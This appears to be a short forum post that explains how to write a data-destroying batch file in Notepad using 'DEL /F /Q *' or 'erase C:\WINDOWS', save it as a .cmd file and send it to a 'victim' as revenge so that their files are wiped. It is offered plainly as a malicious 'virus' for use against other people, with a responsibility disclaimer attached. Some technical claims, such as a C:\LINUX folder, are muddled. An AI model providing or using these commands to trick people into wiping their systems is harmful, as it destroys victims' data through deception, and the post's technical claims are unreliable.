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To delete all folders/files just put this: CODE DEL /F /Q * Into notepad and save it as whateveryouwant.cmd It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something. WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER If you just want to delete the WINDOWS file do this: The only thing you need again is Notepad. Now, to test it, create a textfile called TEST.txt in C:\ Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd". Now run the file "Test.cmd" then open up C:\ and you'll see your Test.txt is gone. Now, the real work begins: Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again. Simple explanation: Go to notepad, type erase C:\WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again. WARNING THIS IS A VERY POWERFULL VIURS ... AND AFF CAN NOT BE HELD RESPONSEBLE FOR YOUR ACTIONS

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